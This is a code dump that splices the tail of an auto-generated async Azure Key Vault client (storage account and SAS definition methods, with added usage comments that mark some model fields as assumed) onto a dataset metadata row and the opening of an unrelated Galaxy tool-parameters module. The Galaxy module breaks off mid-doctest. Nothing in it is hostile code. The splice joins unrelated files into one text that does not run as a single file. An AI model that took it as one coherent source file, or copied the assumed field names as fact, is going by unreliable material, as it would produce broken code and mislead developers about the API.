recover_deleted_certificate.metadata = {'url': '/deletedcertificates/{certificate-name}/recover'} # type: ignore
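# Hypothetical usage sketch: recovery reverses a soft delete and returns the
# recovered CertificateBundle (``client`` is assumed to be an authenticated
# instance of this async client on a soft-delete enabled vault).
#
#     recovered = await client.recover_deleted_certificate(
#         "https://myvault.vault.azure.net", "mycert")
#     print(recovered.id)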
def get_storage_accounts(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.StorageListResult"]:
"""List storage accounts managed by the specified key vault. This operation requires the
storage/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StorageListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.StorageListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_storage_accounts.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StorageListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_storage_accounts.metadata = {'url': '/storage'} # type: ignore
async def delete_storage_account(
self,
vault_base_url: str,
storage_account_name: str,
**kwargs: Any
) -> "_models.StorageBundle":
"""Deletes a storage account. This operation requires the storage/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_storage_account.metadata = {'url': '/storage/{storage-account-name}'} # type: ignore
async def get_storage_account(
self,
vault_base_url: str,
storage_account_name: str,
**kwargs: Any
) -> "_models.StorageBundle":
"""Gets information about a specified storage account. This operation requires the storage/get
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_storage_account.metadata = {'url': '/storage/{storage-account-name}'} # type: ignore
async def set_storage_account(
self,
vault_base_url: str,
storage_account_name: str,
parameters: "_models.StorageAccountCreateParameters",
**kwargs: Any
) -> "_models.StorageBundle":
"""Creates or updates a new storage account. This operation requires the storage/set permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param parameters: The parameters to create a storage account.
:type parameters: ~azure.keyvault.v2016_10_01.models.StorageAccountCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_storage_account.metadata = {'url': '/storage/{storage-account-name}'} # type: ignore
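# Hypothetical usage sketch: assumes ``client`` is an authenticated instance of
# this async client; the StorageAccountCreateParameters field names used below
# (resource_id, active_key_name, auto_regenerate_key, regeneration_period) are
# assumed from the 2016-10-01 models and the values are illustrative only.
#
#     from azure.keyvault.v2016_10_01 import models
#
#     params = models.StorageAccountCreateParameters(
#         resource_id="/subscriptions/.../storageAccounts/mystorage",
#         active_key_name="key1",
#         auto_regenerate_key=True,
#         regeneration_period="P30D")
#     bundle = await client.set_storage_account(
#         "https://myvault.vault.azure.net", "mystorage", params)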
async def update_storage_account(
self,
vault_base_url: str,
storage_account_name: str,
parameters: "_models.StorageAccountUpdateParameters",
**kwargs: Any
) -> "_models.StorageBundle":
"""Updates the specified attributes associated with the given storage account. This operation
requires the storage/set/update permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param parameters: The parameters to update a storage account.
:type parameters: ~azure.keyvault.v2016_10_01.models.StorageAccountUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_storage_account.metadata = {'url': '/storage/{storage-account-name}'} # type: ignore
async def regenerate_storage_account_key(
self,
vault_base_url: str,
storage_account_name: str,
parameters: "_models.StorageAccountRegenerteKeyParameters",
**kwargs: Any
) -> "_models.StorageBundle":
"""Regenerates the specified key value for the given storage account. This operation requires the
storage/regeneratekey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param parameters: The parameters to regenerate the storage account key.
:type parameters: ~azure.keyvault.v2016_10_01.models.StorageAccountRegenerteKeyParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.StorageBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.regenerate_storage_account_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountRegenerteKeyParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('StorageBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
regenerate_storage_account_key.metadata = {'url': '/storage/{storage-account-name}/regeneratekey'} # type: ignore
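# Hypothetical usage sketch: assumes ``client`` is an authenticated instance of
# this async client and that StorageAccountRegenerteKeyParameters exposes a
# ``key_name`` field (an assumption) naming the storage key to roll.
#
#     from azure.keyvault.v2016_10_01 import models
#
#     bundle = await client.regenerate_storage_account_key(
#         "https://myvault.vault.azure.net",
#         "mystorage",
#         models.StorageAccountRegenerteKeyParameters(key_name="key1"))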
def get_sas_definitions(
self,
vault_base_url: str,
storage_account_name: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.SasDefinitionListResult"]:
"""List storage SAS definitions for the given storage account. This operation requires the
storage/listsas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SasDefinitionListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.SasDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_sas_definitions.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SasDefinitionListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_sas_definitions.metadata = {'url': '/storage/{storage-account-name}/sas'} # type: ignore
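# Hypothetical usage sketch: like the other list operations, this returns an
# AsyncItemPaged that is consumed with ``async for`` (``client`` is assumed to
# be an authenticated instance of this async client).
#
#     async for sas in client.get_sas_definitions(
#             "https://myvault.vault.azure.net", "mystorage"):
#         print(sas.id)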
async def delete_sas_definition(
self,
vault_base_url: str,
storage_account_name: str,
sas_definition_name: str,
**kwargs: Any
) -> "_models.SasDefinitionBundle":
"""Deletes a SAS definition from a specified storage account. This operation requires the
storage/deletesas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param sas_definition_name: The name of the SAS definition.
:type sas_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SasDefinitionBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SasDefinitionBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_sas_definition.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
'sas-definition-name': self._serialize.url("sas_definition_name", sas_definition_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SasDefinitionBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_sas_definition.metadata = {'url': '/storage/{storage-account-name}/sas/{sas-definition-name}'} # type: ignore
async def get_sas_definition(
self,
vault_base_url: str,
storage_account_name: str,
sas_definition_name: str,
**kwargs: Any
) -> "_models.SasDefinitionBundle":
"""Gets information about a SAS definition for the specified storage account. This operation
requires the storage/getsas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param sas_definition_name: The name of the SAS definition.
:type sas_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SasDefinitionBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SasDefinitionBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_sas_definition.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
'sas-definition-name': self._serialize.url("sas_definition_name", sas_definition_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SasDefinitionBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_sas_definition.metadata = {'url': '/storage/{storage-account-name}/sas/{sas-definition-name}'} # type: ignore
async def set_sas_definition(
self,
vault_base_url: str,
storage_account_name: str,
sas_definition_name: str,
parameters: "_models.SasDefinitionCreateParameters",
**kwargs: Any
) -> "_models.SasDefinitionBundle":
"""Creates or updates a new SAS definition for the specified storage account. This operation
requires the storage/setsas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param sas_definition_name: The name of the SAS definition.
:type sas_definition_name: str
:param parameters: The parameters to create a SAS definition.
:type parameters: ~azure.keyvault.v2016_10_01.models.SasDefinitionCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SasDefinitionBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SasDefinitionBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_sas_definition.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
'sas-definition-name': self._serialize.url("sas_definition_name", sas_definition_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SasDefinitionCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SasDefinitionBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_sas_definition.metadata = {'url': '/storage/{storage-account-name}/sas/{sas-definition-name}'} # type: ignore
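# Hypothetical usage sketch: assumes ``client`` is an authenticated instance of
# this async client and that ``sas_params`` is an already-populated
# SasDefinitionCreateParameters model (its exact fields are not shown here).
#
#     bundle = await client.set_sas_definition(
#         "https://myvault.vault.azure.net", "mystorage", "mysasdef", sas_params)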
async def update_sas_definition(
self,
vault_base_url: str,
storage_account_name: str,
sas_definition_name: str,
parameters: "_models.SasDefinitionUpdateParameters",
**kwargs: Any
) -> "_models.SasDefinitionBundle":
"""Updates the specified attributes associated with the given SAS definition. This operation
requires the storage/setsas permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param storage_account_name: The name of the storage account.
:type storage_account_name: str
:param sas_definition_name: The name of the SAS definition.
:type sas_definition_name: str
:param parameters: The parameters to update a SAS definition.
:type parameters: ~azure.keyvault.v2016_10_01.models.SasDefinitionUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SasDefinitionBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SasDefinitionBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SasDefinitionBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_sas_definition.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'storage-account-name': self._serialize.url("storage_account_name", storage_account_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
'sas-definition-name': self._serialize.url("sas_definition_name", sas_definition_name, 'str', pattern=r'^[0-9a-zA-Z]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SasDefinitionUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SasDefinitionBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_sas_definition.metadata = {'url': '/storage/{storage-account-name}/sas/{sas-definition-name}'} # type: ignore
| license: mit | hash: 5,830,821,531,992,470,000 | line_mean: 48.203455 | line_max: 158 | alpha_frac: 0.642438 | autogenerated: false | ratio: 4.210358 | config_test: false | has_no_keywords: false | few_assignments: false |

| repo_name: jmchilton/galaxy-central | path: galaxy/tools/parameters.py | copies: 1 | size: 19896 | content: |
"""
Classes encapsulating tool parameters
"""
import logging, string, sys
from galaxy import config, datatypes, util, form_builder
import validation
from elementtree.ElementTree import XML, Element
log = logging.getLogger(__name__)
class ToolParameter( object ):
"""
Describes a parameter accepted by a tool. This is just a simple stub at the
moment but in the future should encapsulate more complex parameters (lists
of valid choices, validation logic, ...)
"""
def __init__( self, tool, param ):
self.tool = tool
self.name = param.get("name")
self.label = util.xml_text(param, "label")
self.help = util.xml_text(param, "help")
self.html = "no html set"
self.validators = []
for elem in param.findall("validator"):
self.validators.append( validation.Validator.from_element( elem ) )
def get_label( self ):
"""Return user friendly name for the parameter"""
if self.label: return self.label
else: return self.name
def get_html( self, trans=None, value=None, other_values={} ):
"""
Returns the html widget corresponding to the parameter.
Optionally attempt to retain the current value specified by 'value'.
"""
return self.html
def get_required_enctype( self ):
"""
If this parameter needs the form to have a specific encoding
return it, otherwise return None (indicating compatibility with
any encoding)
"""
return None
def filter_value( self, value, trans=None, other_values={} ):
"""
Parse the value returned by the view into a form usable by the tool OR
raise a ValueError.
"""
return value
def to_string( self, value, app ):
"""Convert a value to a string representation suitable for persisting"""
return str( value )
def to_python( self, value, app ):
"""Convert a value created with to_string back to an object representation"""
return value
def validate( self, value, history=None ):
for validator in self.validators:
validator.validate( value, history )
@classmethod
def build( cls, tool, param ):
"""Factory method to create parameter of correct type"""
param_type = param.get("type")
if not param_type or param_type not in parameter_types:
raise ValueError( "Unknown tool parameter type '%s'" % param_type )
else:
return parameter_types[param_type]( tool, param )
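# Hypothetical usage sketch: assumes the ``parameter_types`` registry defined
# later in this module maps the "text" type to TextToolParameter, so build()
# dispatches on the XML "type" attribute.
#
#     param = ToolParameter.build( None, XML( '<param name="q" type="text" size="4" value="hi"/>' ) )
#     print param.get_html()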
class TextToolParameter( ToolParameter ):
"""
Parameter that can take on any text value.
>>> p = TextToolParameter( None, XML( '<param name="blah" type="text" size="4" value="default" />' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="text" name="blah" size="4" value="default">
>>> print p.get_html( value="meh" )
